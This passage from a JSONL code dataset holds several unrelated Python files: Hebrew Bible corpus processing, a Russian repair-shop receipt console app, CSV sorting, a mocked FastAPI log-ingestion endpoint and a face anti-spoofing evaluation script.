self.rec_signs = ''.join(['n' for char in self.glyphs])\n self.cor_signs = ''.join(['n' for char in self.glyphs])\n self.nme = self.get_nme()\n self.prs = self.get_prs()\n self.stem = self.get_stem()\n self.heb_text_adder = HebrewTextAdder(self.glyphs)\n self.heb_g_cons = self.heb_text_adder.get_hebrew_g_cons()\n self.prefix = self.parse_prefix_g_cons_sp()\n\n def create_word(self):\n\n return Word(self.tf_id,\n self.book,\n self.chapter_num,\n self.verse_num,\n self.glyphs,\n self.lexeme,\n self.sp,\n self.person,\n self.number,\n self.gender,\n self.state,\n self.vs,\n self.vt,\n self.lang,\n self.rec_signs,\n self.cor_signs,\n stem=self.stem,\n prs_cons=self.prs,\n nme_cons=self.nme,\n hloc=self.hloc,\n prefix=self.prefix,\n heb_g_cons=self.heb_g_cons)\n\n def get_number(self):\n number = Fsp.nu.v(self.tf_id)\n if number in {'unknown', 'NA'}:\n return None\n return number\n\n def get_gender(self):\n gender = Fsp.gn.v(self.tf_id)\n if gender == 'NA':\n return None\n\n def get_state(self):\n \"\"\"Not implemented yet\"\"\"\n return None\n\n def get_he_locale(self):\n \"\"\"Not implemented yet\"\"\"\n h_loc = ''\n if Fsp.g_uvf.v(self.tf_id) == '~H':\n h_loc = 'H'\n return h_loc\n\n def get_prs(self):\n suff = Fsp.g_prs.v(self.tf_id)\n if suff == '+':\n suff = 'J'\n prs_cons = ''.join([ch for ch in suff if ch in self.prs_chars])\n return prs_cons\n\n def get_stem(self):\n \"\"\"Not implemented yet\"\"\"\n stem = Fsp.g_lex.v(self.tf_id)\n if self.lexeme in relevant_wt_words and self.number == 'sg' \\\n and not stem.endswith('T') and self.nme.startswith('T'):\n stem += 'T'\n self.nme = self.nme.lstrip('T')\n elif self.lexeme in fem_ending_numbers:\n stem = stem[:-1]\n self.nme = 'T' + self.nme\n return stem\n\n def get_nme(self):\n nme_cons = ''.join([ch for ch in Fsp.g_nme.v(self.tf_id) if ch in self.consonants])\n return nme_cons\n\n def parse_prefix_g_cons_sp(self):\n prefix = ''\n previous_word_id = self.tf_id - 1\n\n while not Fsp.trailer.v(previous_word_id):\n prev_word_g_cons = Fsp.g_cons.v(previous_word_id)\n if not prev_word_g_cons:\n prev_word_g_cons = ''\n prefix = prev_word_g_cons + prefix\n previous_word_id = previous_word_id - 1\n if previous_word_id not in self.sp_word_nodes:\n break\n return prefix\n\n\nclass Corpus:\n \"\"\"\"\"\"\n def __init__(self, corpus_name):\n self.corpus_name = corpus_name\n self.scroll_set = set()\n self.scroll_verse_set = set()\n\n self.add_dss()\n self.add_mt()\n self.add_sp()\n\n def add_dss(self):\n \"\"\"\n add_dss adds the DSS data to the corpus.\n It creates Scroll objects,\n and adds Verse and WOrds objects to them.\n \"\"\"\n for scr in Fdss.otype.s('scroll'):\n scroll_name = Tdss.scrollName(scr)\n # Is the if... needed? check: heeft te maken met 11q4 ezekiel/Psalms issue\n if scroll_name not in self.scroll_set:\n scroll = Scroll(scroll_name)\n self.scroll_set.add(scroll_name)\n\n words = Ldss.d(scr, 'word')\n for wo in words:\n word_processor = DSSWordProcessor(wo)\n dss_word_object = word_processor.create_word()\n bo, ch, ve = dss_word_object.book, dss_word_object.chapter_num, dss_word_object.verse_num\n\n if not all([bo, ch, ve]) or ('f' in ch) or (dss_word_object.lex in {None, ''}):\n continue\n\n scroll_verse = (scroll_name, bo, ch, ve)\n if scroll_verse not in self.scroll_verse_set:\n\n verse = Verse(scroll_name, bo, ch, ve)\n Scroll.scrolls[scroll_name].verses[(bo, int(ch), int(ve))] = verse\n self.scroll_verse_set.add(scroll_verse)\n Scroll.scrolls[scroll_name].verses[(bo, int(ch), int(ve))].words.append(dss_word_object)\n\n def add_mt(self):\n \"\"\"\n Does the same as add_dss, but then for the MT data.\n \"\"\"\n scroll = Scroll('MT')\n\n for b in F.otype.s('book'):\n verses = L.d(b, 'verse')\n for v in verses:\n bo, ch, ve = T.sectionFromNode(v)\n verse = Verse('MT', bo, ch, ve)\n scroll.verses[(bo, int(ch), int(ve))] = verse\n words = L.d(v, 'word')\n for wo in words:\n word_processor = MTWordProcessor(wo)\n mt_word_object = word_processor.create_word()\n scroll.verses[(bo, int(ch), int(ve))].words.append(mt_word_object)\n\n def add_sp(self):\n \"\"\"\n Adds the Samaritan Pentateuch to the corpus.\n Note that verses are not converted to integer, because there is a verse '36a' in Genesis.\n This could become nasty somewhere. Todo: find solution for this.\n \"\"\"\n scroll = Scroll('SP')\n sp_word_nodes = set(Fsp.otype.s('word'))\n\n for b in Fsp.otype.s('book'):\n verses = Lsp.d(b, 'verse')\n for v in verses:\n bo, ch, ve = Tsp.sectionFromNode(v)\n verse = Verse('SP', bo, ch, ve)\n scroll.verses[(bo, int(ch), ve)] = verse\n words = Lsp.d(v, 'word')\n for wo in words:\n word_processor = SPWordProcessor(wo, sp_word_nodes)\n sp_word_object = word_processor.create_word()\n scroll.verses[(bo, int(ch), ve)].words.append(sp_word_object)\n","repo_name":"MartijnNaaijer/hebrew_spelling_variation","sub_path":"preprocess_data/src/data_classes.py","file_name":"data_classes.py","file_ext":"py","file_size_in_byte":29509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18456861408","text":"from datetime import timedelta\nimport datetime\nimport random\nimport json\n\nclients = []\nadmin = []\ndate = datetime.date.today()\ndate2 = (date + timedelta(days=random.randint(1, 5))).strftime(\"%d.%m.%Y\")\ndate = date.strftime(\"%d.%m.%Y\")\n\n\nclass Receipt:\n count = 1\n\n def __init__(self, receipt_number, product_type, date_of_receipt, date_of_completion, full_name, status):\n self.receipt_number = receipt_number\n self.product_type = product_type\n self.date_of_receipt = date_of_receipt\n self.date_of_completion = date_of_completion\n self.full_name = full_name\n self.status = status\n Receipt.count += 1\n\n @staticmethod\n def clients_new():\n name = input(\"Введите Ф.И.О\")\n technics = input(\"Выберите, что ремонтируем:\\n\"\n \"1-Телефон\\n\"\n \"2-Нотбук\\n\"\n \"3-Телевизор\\n\")\n\n if technics == '1':\n tel = Telephone(Receipt.count, 'телефон', input(\"Марка телефона\"),\n input(\"Введите операционную систему\"), input(\"Опишите поломку\"),\n date, date2, name, \"ремонтируется\")\n tel.conclusion()\n\n elif technics == '2':\n lap = Laptop(Receipt.count, 'ноутбук', input(\"Марка ноутбука\"),\n input(\"Введите операционную систему\"), input(\"Дата выпуска\"), input(\"Опишите поломку\"),\n date, date2, name, \"ремонтируется\")\n lap.conclusion()\n\n elif technics == '3':\n tv = Tv(Receipt.count, \"телевизор\", input(\"Введите марку телевизора\"),\n input(\"Введите диагональ экрана\"), input(\"Опишите поломку\"), date,\n date2, name, \"ремонтируется\")\n tv.conclusion()\n\n @staticmethod\n def receipt_info():\n step2 = input(\"Поиск: 1-по номеру квитанции\\n\"\n \"2-по ФИО\\n\")\n if step2 == \"1\":\n z = int(input(\"Введите номер квитанции\"))\n for m in clients:\n if z in m:\n print(m)\n break\n else:\n print(\"Клиент с такими данными отсутствует\")\n if step2 == \"2\":\n z1 = input(\"Введите ФИО\")\n for p in clients:\n if z1 in p:\n print(p)\n\n\nclass Admin:\n def __init__(self, login, password, name):\n self.name = name\n self.password = password\n self.login = login\n k = [self.login, self.password, self.name]\n admin.append(k)\n\n @staticmethod\n def admin_action():\n login = input('Ведите логин администратора')\n password1 = input('Введите пароль')\n for v in admin:\n if login in v[0] and password1 in v[1]:\n print(f\"Приветствую Вас: {v[2]}\")\n choice = input(\"Выберите действие:\\n\"\n \"1-панель администратора\\n\"\n \"2-работа с квитанциями\\n\")\n if choice == '1':\n arm = input(\"1-отобразить список всех админов\\n\"\n \"2-удалить админа из списка\\n\"\n \"3-добавить нового админа\\n\")\n if arm == '1':\n for b in admin:\n print(b[2])\n elif arm == '2':\n for q in admin:\n print(q[2])\n all1 = input(\"Введите ФИО кого удалить\")\n for t in admin:\n if all1 in t:\n admin.remove(t)\n print(admin)\n\n elif arm == '3':\n Admin(input(\"Введите логин администратора\"), input(\"Введите пароль администратора\"),\n input(\"Введите Ф.И.О. администратора\"))\n print(admin)\n\n elif choice == '2':\n z = int(input(\"Введите номер квитанции\"))\n for g in clients:\n if z in g:\n z1 = input(\"Выберете действие:\\n\"\n \"1-изменить статус ремонта\\n\"\n \"2-изменить дату выполнения ремонта\\n\"\n \"3-посмотреть иформацию о квитанции\\n\")\n if z1 == \"1\":\n for y in clients:\n if z in y:\n y[-1] = input(\"Введите статус\")\n print(y)\n\n elif z1 == \"2\":\n for w in clients:\n if z in w:\n w[6] = input(\"Введите дату завершения ремонта\")\n print(w)\n\n elif z1 == \"3\":\n for e in clients:\n if z in e:\n print(e)\n break\n else:\n print(\"Клиент с такими данными отсутствует\")\n break\n else:\n print(\"Пользователь с таким логином и паролем отсутствует\")\n\n\nclass Telephone(Receipt):\n def __init__(self, receipt_number, product_type, brand, operating_system, breaking,\n date_of_receipt, date_of_completion, full_name, status):\n super().__init__(receipt_number, product_type, date_of_receipt, date_of_completion, full_name, status)\n self.brand = brand\n self.operating_system = operating_system\n self.breaking = breaking\n a = [self.receipt_number, self.product_type, self.brand, self.operating_system, self.breaking,\n self.date_of_receipt, self.date_of_completion, self.full_name, self.status]\n clients.append(a)\n\n def conclusion(self):\n print(\n f\"Номер квитанции:{self.receipt_number}\\n\"\n f\"Тип изделия:{self.product_type}\\n\"\n f\"Марка телефона:{self.brand}\\n\"\n f\"Операционная система :{self.operating_system}\\n\"\n f\"Опиcание поломки :{self.breaking}\\n\"\n f\"Дата приемки:{self.date_of_receipt}\\n\"\n f\"Дата выполнения ремонта:{self.date_of_completion}\\n\"\n f\"Ф.И.О:{self.full_name}\\n\"\n f\"Статус:{self.status}\\n\"\n )\n\n\nclass Laptop(Receipt):\n\n def __init__(self, receipt_number, product_type, brand, operating_system, production_date, breaking,\n date_of_receipt, date_of_completion, full_name, status):\n super().__init__(receipt_number, product_type, date_of_receipt, date_of_completion, full_name, status)\n self.production_date = production_date\n self.brand = brand\n self.operating_system = operating_system\n self.breaking = breaking\n b = [self.receipt_number, self.product_type, self.brand, self.operating_system, self.production_date,\n self.breaking, self.date_of_receipt, self.date_of_completion, self.full_name, self.status]\n clients.append(b)\n\n def conclusion(self):\n print(\n f\"Номер квитанции:{self.receipt_number}\\n\"\n f\"Тип изделия:{self.product_type}\\n\"\n f\"Марка ноутбука:{self.brand}\\n\"\n f\"Операционная система :{self.operating_system}\\n\"\n f\"Год выпуска:{self.production_date}\\n\"\n f\"Опиcание поломки :{self.breaking}\\n\"\n f\"Дата приемки:{self.date_of_receipt}\\n\"\n f\"Дата выполнения ремонта:{self.date_of_completion}\\n\"\n f\"Ф.И.О:{self.full_name}\\n\"\n f\"Статус:{self.status}\\n\"\n )\n\n\nclass Tv(Telephone):\n\n def conclusion(self):\n print(\n f\"Номер квитанции:{self.receipt_number}\\n\"\n f\"Тип изделия:{self.product_type}\\n\"\n f\"Марка телевизора:{self.brand}\\n\"\n f\"Диагональ экрана :{self.operating_system}\\n\"\n f\"Опиcание поломки :{self.breaking}\\n\"\n f\"Дата приемки:{self.date_of_receipt}\\n\"\n f\"Дата выполнения ремонта:{self.date_of_completion}\\n\"\n f\"Ф.И.О:{self.full_name}\\n\"\n f\"Статус:{self.status}\\n\")\n\n\nadmin1 = Admin('11', '222', 'Семен Игоревич')\nadmin2 = Admin('seganik4', '654321R', 'Валерий Иванович')\nadmin3 = Admin('bugimen', '13579P', 'Галина Николаевна')\n\nclients1 = Telephone(Receipt.count, 'телефон', 'samsung', 'андроид', 'разбит экран', '12.02.2022',\n '17.02.2022', 'Андрей Белов', 'ремонт')\nclients2 = Tv(Receipt.count, 'телевизор', 'LG', '52 дюйма', 'не включается', '12.02.2022', '17.02.2022',\n 'Иван Усович', 'готово')\nclients3 = Laptop(Receipt.count, 'ноутбук', 'acer', 'windows', '2019 год выпуска', 'не включается',\n '12.02.2022', '17.02.2022', 'Гарик Харламов', 'ремонт')\nclients4 = Telephone(Receipt.count, 'телефон', 'xiaomi', 'андроид', 'не заряжается', '12.02.2022',\n '17.02.2022', 'Павел Воля', 'ремонт')\nclients5 = Telephone(Receipt.count, 'телефон', 'apple', 'ios', 'зависает', '12.02.2022', '17.02.2022',\n 'Михаил Галустян', 'ремонт')\nclients6 = Telephone(Receipt.count, 'телефон', 'xiaomi', 'андроид', 'не включается', '15.02.2022', '18.02.2022',\n 'Михаил Галустян', 'готов')\n\nwhile True:\n step1 = input(\"Выберете действие:\\n\"\n \"1-Сдать в ремонт\\n\"\n \"2-Постмотреть информацию\\n\"\n \"3-Зайти в панель администратора\\n\")\n if step1 == '1':\n Receipt.clients_new()\n\n elif step1 == '2':\n Receipt.receipt_info()\n\n elif step1 == '3':\n Admin.admin_action()\n\n with open(\"file.txt\", \"w\") as file:\n json.dump(clients, file)\n with open(\"file.txt\", \"r\") as file:\n f = json.load(file)\n for i in f:\n print(i)\n","repo_name":"siarhei-nik/Project1","sub_path":"project ООП.py","file_name":"project ООП.py","file_ext":"py","file_size_in_byte":11579,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6411977525","text":"import pandas as pd\n\ndef sort_csv_by_activity_date_and_activity_time(raw_csv, destFilename):\n\n data = pd.read_csv(raw_csv)[['square_id','activity_date', 'cluster', 'activity_time', 'energy']]\n data.sort_values(by=['activity_date','square_id','activity_time'], ascending=True, inplace=True)\n data.to_csv(destFilename, index=False)\n\n# tem que rodar duas vezes, uma para descobri dados que não significam nada no final a partir dos dados originais\n# e outra vez vez a partir dos dados limpos para organizar corretamente\n# sort_csv_by_activity_date_and_activity_time(\"C:\\\\Users\\\\ggpsg\\\\Downloads\\\\Dados\\\\full-activity-anomalies_minutes-nov1dec22-raw.csv\",\n# \"dados\\\\milan-sorted.csv\")\n\nsort_csv_by_activity_date_and_activity_time(\"dados\\milan-sorted.csv\", \"dados\\\\milan-sorted.csv\")\n\nprint(pd.read_csv(\"dados\\\\milan-sorted.csv\").head())\n","repo_name":"ggpsgeorge/Milan-Cluster","sub_path":"csv-sorting.py","file_name":"csv-sorting.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"11249668237","text":"from fastapi import FastAPI, File, UploadFile\r\nfrom fastapi.responses import JSONResponse\r\nfrom typing import List, Any\r\nimport json\r\nimport boto3 #not used as we have AWS comms commented out\r\n\r\napp = FastAPI()\r\n\r\nclass AWSIngestError(Exception):\r\n def __init__(self, message):\r\n super().__init__(message)\r\n\r\n@app.post(\"/ingestLogs/\")\r\nasync def upload_files(files: List[UploadFile], clientID: str):\r\n \"\"\"\r\n Upload and process files in JSON or TXT format.\r\n\r\n This endpoint accepts a list of uploaded files, processes them based on their\r\n file type (JSON or TXT), and returns the processed data.\r\n\r\n Args:\r\n files (List[UploadFile]): A list of uploaded files to process.\r\n clientID: would be passed later via the bearer token and we can resolve the client jwt.io\r\n\r\n Returns:\r\n Dict[str, Union[str, List[Dict[str, Union[str, Any]]]]]: A dictionary containing\r\n information about the processed files. The structure is as follows:\r\n {\r\n \"files\": [\r\n {\r\n \"file_name\": str,\r\n \"file_type\": str (either 'json' or 'txt')\r\n },\r\n ...\r\n ]\r\n }\r\n\r\n Raises:\r\n JSONResponse: If there is an error in the uploaded files, such as invalid\r\n JSON format or an unsupported file format, an appropriate error response is returned.\r\n \"\"\"\r\n\r\n # VERIFY THE BEARER TOKEN\r\n # METER THE REQUEST FOR COST/USAGE TRACKING\r\n\r\n results = []\r\n clientConfig = getClientConfig(clientID)\r\n\r\n for file in files:\r\n if file.filename.endswith('.json'):\r\n # Handle JSON files\r\n try:\r\n content = await file.read()\r\n data = json.loads(content.decode('utf-8'))\r\n try:\r\n stage_in_s3_and_queue(data, file.filename, clientConfig)\r\n results.append({\"file_name\": file.filename, \"file_type\": \"json\"})\r\n except:\r\n raise AWSIngestError(\"Ingestion Error\")\r\n except json.JSONDecodeError as e:\r\n return JSONResponse(content={\"error\": \"Invalid JSON format\"}, status_code=400)\r\n except AWSIngestError as e:\r\n # Something went wrong writing to AWS - may want to keep going in the future and just provide a digest of failures\r\n print(f\"An error occurred: {e}\")\r\n return({\r\n \"status\": \"An Error Occured\",\r\n \"clientConfig\": clientConfig,\r\n \"failedFile\": file.filename\r\n })\r\n\r\n elif file.filename.endswith('.txt'):\r\n # Handle TXT files\r\n try:\r\n content = await file.read()\r\n text_data = content.decode('utf-8')\r\n try:\r\n stage_in_s3_and_queue(text_data, file.filename, clientConfig)\r\n results.append({\"file_name\": file.filename, \"file_type\": \"txt\"})\r\n except:\r\n raise AWSIngestError(\"Ingestion Error\")\r\n except Exception as e:\r\n return JSONResponse(content={\"error\": \"Error reading TXT file\"}, status_code=400)\r\n\r\n else:\r\n return JSONResponse(content={\"error\": \"Unsupported file format\"}, status_code=400)\r\n \r\n #TODO: build out response in standard format\r\n return ({\r\n \"status\" : \"success\",\r\n \"files\": results\r\n }) \r\n\r\nif __name__ == \"__main__\":\r\n import uvicorn\r\n uvicorn.run(app, host=\"0.0.0.0\", port=8002)\r\n\r\ndef stage_in_s3_and_queue(file_bytes, filename, clientConfig):\r\n '''\r\n Leaving commented out the actual interaction with AWS as we don't have any real infrastructure\r\n and mocking this to allow the API for ingestion to function.\r\n\r\n This can be purposely failed by sending empty input values so you can raise the custom error\r\n '''\r\n # Initialize AWS S3 and SQS clients\r\n #s3_client = boto3.client('s3')\r\n #sqs_client = boto3.client('sqs')\r\n\r\n try:\r\n # Verify input params\r\n if any(arg is None for arg in (file_bytes, filename, clientConfig)):\r\n raise TypeError\r\n \r\n # Upload the bytes to S3\r\n #s3_client.put_object(Bucket=bucket_name, Key=object_key, Body=file_bytes)\r\n\r\n\r\n # Construct the S3 URL of the uploaded file\r\n s3_url = f\"https://{clientConfig['clientS3Bucket']}.s3.amazonaws.com/stage/{filename}\"\r\n \r\n # Place the S3 URL in SQS\r\n #response = sqs_client.send_message(\r\n # QueueUrl=clientConfig[\"clientSQSQueue\"],\r\n # MessageBody={\r\n # \"s3Url\": s3_url,\r\n # \"clientConfig\": clientConfig\r\n # }\r\n #)\r\n\r\n # Print a success message\r\n print(f\"File uploaded to S3: {s3_url}\")\r\n #print(f\"Message sent to SQS with MessageId: {response['MessageId']}\")\r\n print(f\"Message sent to SQS with MessageId: ak3ka0402k214s\")\r\n\r\n except Exception as e:\r\n print(f\"Error uploading file to S3 or sending SQS message: {str(e)}\")\r\n except TypeError as e:\r\n print(f\"Mising Input Variables\")\r\n\r\ndef getClientConfig(clientID: str):\r\n '''\r\n Fully mocked - allows us to raise the complexity of how/where we store data and name things\r\n without needing to really tinker with how this all works.\r\n\r\n Plan: Move this data to DynamoDB and make this function a query to that datatable\r\n '''\r\n return({\r\n \"clientID\" : clientID,\r\n \"clientIndexPattern\": clientID + '_09192023', #date based index, likely want to encode even the clientid for more security\r\n \"clientRSTable\": clientID + '_table', #assumes single cluster many tables\r\n \"clientS3Bucket\": clientID + '_3k30ak3K3k60', #random guid would be added for global names - each environment would be distinct\r\n \"clientSQSQueue\": clientID + \"_sqs\"\r\n })\r\n","repo_name":"kjeckell/helloWorld_backend","sub_path":"B-CodeTask/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29240657144","text":"#from core.Evaluate import Evaluate\n# from core.Evaluate_transformer import Evaluate\n#from core.Evaluate_MTL_EfficientNet import Evaluate\nfrom core.Evaluate_MTL_EfficientNet_full import Evaluate\n\n\nimport argparse\nimport os\nimport json\nfrom shutil import copyfile\nimport matplotlib\n#matplotlib.use('Agg')\n#import matplotlib.pyplot as plt\n\nparser = argparse.ArgumentParser(description='STTN')\nparser.add_argument('-c', '--config', default='configs/SiW.json', type=str)\n\nargs = parser.parse_args()\n\n\n\n\ndef main_worker(config):\n config_path = os.path.join(\n config['save_dir'], config['config'].split('/')[-1])\n if not os.path.isfile(config_path):\n copyfile(config['config'], config_path)\n\n os.environ['CUDA_VISIBLE_DEVICES'] = config['test']['gpu']\n\n dataset = os.path.basename(args.config).split('.')[0]\n config['dataset'] = dataset\n\n ACC_all_val = []\n APCER_all_val= []\n BPCER_all_val = []\n ACER_all_val = []\n\n\n ACC_enc_all_val = []\n APCER_enc_all_val= []\n BPCER_enc_all_val = []\n ACER_enc_all_val = []\n\n\n ACC_dec_all_val = []\n APCER_dec_all_val = []\n BPCER_dec_all_val = []\n ACER_dec_all_val = []\n\n\n ACC_all = []\n APCER_all= []\n BPCER_all = []\n ACER_all = []\n threshold_all=[]\n\n ACC_enc_all = []\n APCER_enc_all= []\n BPCER_enc_all = []\n ACER_enc_all = []\n threshold_all_enc_cls = []\n\n ACC_dec_all = []\n APCER_dec_all= []\n BPCER_dec_all = []\n ACER_dec_all = []\n threshold_all_depth_cls = []\n\n ACC_vote_all = []\n APCER_vote_all= []\n BPCER_vote_all = []\n ACER_vote_all = []\n\n save_dir =config['save_dir']\n model_dir = config['test']['ckpt']\n [first_model, last_model]= config['test']['test_model']\n evaluate = Evaluate(config, 'test')\n\n if first_model == last_model:\n last_model = first_model +1\n for i in range(first_model,last_model+1, config['test']['test_model_sample_interval']):\n trained_model = model_dir+\"gen_%05d\"%i+\".pth\"\n ep = i\n config['test']['ckpt'] = trained_model\n # save_dir_i = os.path.join(save_dir, \"%04d\"%i)\n # if not os.path.isdir(save_dir_i):\n # os.mkdir(save_dir_i)\n # config['save_dir'] = save_dir_i\n\n # ACC, APCER, BPCER, ACER, threshold, fprs, tprs, thresholds, acc_list, thresholds_test, \\\n # ACC_cls_enc, APCER_cls_enc, BPCER_cls_enc, ACER_cls_enc, \\\n # ACC_cls_dec, APCER_cls_dec, BPCER_cls_dec, ACER_cls_dec,\\\n # ACC_vote, APCER_vote, BPCER_vote, ACER_vote= evaluate.evaluate(ep, config['test']['ckpt'])\n\n threshold, ACC_val, APCER_val, BPCER_val, ACER_val, APCERs_val, BPCERs_val, \\\n threshold_enc_cls, ACC_val_enc_cls, APCER_val_enc_cls, BPCER_val_enc_cls, ACER_val_enc_cls, APCERs_val_enc_cls, BPCERs_val_enc_cls, \\\n threshold_depth_cls, ACC_val_depth_cls, APCER_val_depth_cls, BPCER_val_depth_cls, ACER_val_depth_cls, APCERs_val_depth_cls, BPCERs_val_depth_cls, \\\n ACC, APCER, BPCER, ACER, \\\n ACC_cls_enc, APCER_cls_enc, BPCER_cls_enc, ACER_cls_enc, \\\n ACC_cls_dec, APCER_cls_dec, BPCER_cls_dec, ACER_cls_dec, \\\n ACC_vote, APCER_vote, BPCER_vote, ACER_vote = evaluate.evaluate(ep, config['test']['ckpt'])\n\n ACC_all_val.append(ACC_val)\n APCER_all_val.append(APCER_val)\n BPCER_all_val.append(BPCER_val)\n ACER_all_val.append(ACER_val)\n\n\n ACC_enc_all_val.append(ACC_val_enc_cls)\n APCER_enc_all_val.append(APCER_val_enc_cls)\n BPCER_enc_all_val.append(BPCER_val_enc_cls)\n ACER_enc_all_val.append(ACER_val_enc_cls)\n\n ACC_dec_all_val.append(ACC_val_depth_cls)\n APCER_dec_all_val.append(APCER_val_depth_cls)\n BPCER_dec_all_val.append(BPCER_val_depth_cls)\n ACER_dec_all_val.append(ACER_val_depth_cls)\n\n\n ACC_all.append(ACC)\n APCER_all.append(APCER)\n BPCER_all.append(BPCER)\n ACER_all.append(ACER)\n threshold_all.append(threshold)\n\n ACC_enc_all.append(ACC_cls_enc)\n APCER_enc_all.append(APCER_cls_enc)\n BPCER_enc_all.append(BPCER_cls_enc)\n ACER_enc_all.append(ACER_cls_enc)\n threshold_all_enc_cls.append(threshold_enc_cls)\n\n ACC_dec_all.append(ACC_cls_dec)\n APCER_dec_all.append(APCER_cls_dec)\n BPCER_dec_all.append(BPCER_cls_dec)\n ACER_dec_all.append(ACER_cls_dec)\n threshold_all_depth_cls.append(threshold_depth_cls)\n\n ACC_vote_all.append(ACC_vote)\n APCER_vote_all.append(APCER_vote)\n BPCER_vote_all.append(BPCER_vote)\n ACER_vote_all.append(ACER_vote)\n\n print(\"\"\"threshold= %.4f, ACC= %.4f, APCER= %.4f, BPCER= %.4f, ACER= %.4f\\n\n ACC_enc= %.4f, APCER_enc= %.4f, BPCER_enc= %.4f, ACER_enc= %.4f\\n\n ACC_dec= %.4f, APCER_dec= %.4f, BPCER_dec= %.4f, ACER_dec= %.4f\\n\n ACC_vote= %.4f, APCER_vote= %.4f, BPCER_vote= %.4f, ACER_vote= %.4f\\n\"\"\" % (\n threshold, ACC, APCER, BPCER, ACER, \\\n ACC_cls_enc, APCER_cls_enc, BPCER_cls_enc, ACER_cls_enc, \\\n ACC_cls_dec, APCER_cls_dec, BPCER_cls_dec, ACER_cls_dec, \\\n ACC_vote, APCER_vote, BPCER_vote, ACER_vote))\n with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'log.txt'), 'w') as f:\n f.write(\"\"\"threshold= %.4f, ACC= %.4f, APCER= %.4f, BPCER= %.4f, ACER= %.4f\\n \n threshold_enc_cls= %.4f, ACC_enc= %.4f, APCER_enc= %.4f, BPCER_enc= %.4f, ACER_enc= %.4f\\n \n threshold_dec_cls= %.4f, ACC_dec= %.4f, APCER_dec= %.4f, BPCER_dec= %.4f, ACER_dec= %.4f\\n\n ACC_vote= %.4f, APCER_vote= %.4f, BPCER_vote= %.4f, ACER_vote= %.4f\\n\"\"\" % (\n threshold, ACC, APCER, BPCER, ACER, \\\n threshold_enc_cls, ACC_cls_enc, APCER_cls_enc, BPCER_cls_enc, ACER_cls_enc, \\\n threshold_depth_cls, ACC_cls_dec, APCER_cls_dec, BPCER_cls_dec, ACER_cls_dec, \\\n ACC_vote, APCER_vote, BPCER_vote, ACER_vote))\n with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'APCERs_val.txt'), 'w') as f:\n f.write('APCERs_val\\n')\n for i, apcer in enumerate(APCERs_val):\n f.write('%f\\n' % (apcer))\n with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'BPCERs_val.txt'), 'w') as f:\n f.write('BPCERs_val\\n')\n for i, bpcer in enumerate(BPCERs_val):\n f.write('%f\\n' % (bpcer))\n with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'APCERs_val_enc_cls.txt'), 'w') as f:\n f.write('APCERs_val_enc_cls\\n')\n for i, apcer in enumerate(APCERs_val_enc_cls):\n f.write('%f\\n' % (apcer))\n with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'BPCERs_val_enc_cls.txt'), 'w') as f:\n f.write('BPCERs_val_enc_cls\\n')\n for i, bpcer in enumerate(BPCERs_val_enc_cls):\n f.write('%f\\n' % (bpcer))\n with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'APCERs_val_depth_cls.txt'), 'w') as f:\n f.write('APCERs_val_depth_cls\\n')\n for i, apcer in enumerate(APCERs_val_depth_cls):\n f.write('%f\\n' % (apcer))\n with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'BPCERs_val_depth_cls.txt'), 'w') as f:\n f.write('BPCERs_val_depth_cls\\n')\n for i, bpcer in enumerate(BPCERs_val_depth_cls):\n f.write('%f\\n' % (bpcer))\n # with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'val_fpr.txt'), 'w') as f:\n # f.write('fps\\n')\n # for i, fpr in enumerate(fprs):\n # f.write('%f\\n' %(fpr))\n # with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'val_tpr.txt'), 'w') as f:\n # f.write('tprs\\n')\n # for i, fpr in enumerate(fprs):\n # f.write('%f\\n' %(tprs[i]))\n # with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'val_threholds.txt'), 'w') as f:\n # f.write('thresholds\\n')\n # for i, fpr in enumerate(fprs):\n # f.write('%f\\n' %(thresholds[i]))\n # with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'acc_test.txt'), 'w') as f:\n # f.write('acc\\n')\n # for i, acc in enumerate(acc_list):\n # f.write('%f\\n' %(acc))\n # with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'threholds_test.txt'), 'w') as f:\n # f.write('thresholds_test\\n')\n # for i, acc in enumerate(acc_list):\n # f.write('%f\\n' %(thresholds_test[i]))\n\n ## PAD by thresholding the estimated depth map\n with open(os.path.join(save_dir, 'ACC_all_val.txt'), 'w') as f:\n f.write('ACC_all_val\\n')\n for i, acc in enumerate(ACC_all_val):\n f.write('%f\\n' % (acc))\n with open(os.path.join(save_dir, 'APCER_all_val.txt'), 'w') as f:\n f.write('APCER_all_val\\n')\n for i, apcer in enumerate(APCER_all_val):\n f.write('%f\\n' % (apcer))\n with open(os.path.join(save_dir, 'BPCER_all_val.txt'), 'w') as f:\n f.write('BPCER_all_val\\n')\n for i, bpcer in enumerate(BPCER_all_val):\n f.write('%f\\n' % (bpcer))\n with open(os.path.join(save_dir, 'ACER_all_val.txt'), 'w') as f:\n f.write('ACER_all_val\\n')\n for i, acer in enumerate(ACER_all_val):\n f.write('%f\\n' % (acer))\n\n\n ## classification by the encoder/transformer\n with open(os.path.join(save_dir, 'ACC_enc_all.txt'), 'w') as f:\n f.write('ACC_enc_all\\n')\n for i, acc in enumerate(ACC_enc_all):\n f.write('%f\\n' % (acc))\n with open(os.path.join(save_dir, 'APCER_enc_all.txt'), 'w') as f:\n f.write('APCER_enc_all\\n')\n for i, apcer in enumerate(APCER_enc_all):\n f.write('%f\\n' % (apcer))\n with open(os.path.join(save_dir, 'BPCER_enc_all.txt'), 'w') as f:\n f.write('BPCER_enc_all\\n')\n for i, bpcer in enumerate(BPCER_enc_all):\n f.write('%f\\n' % (bpcer))\n with 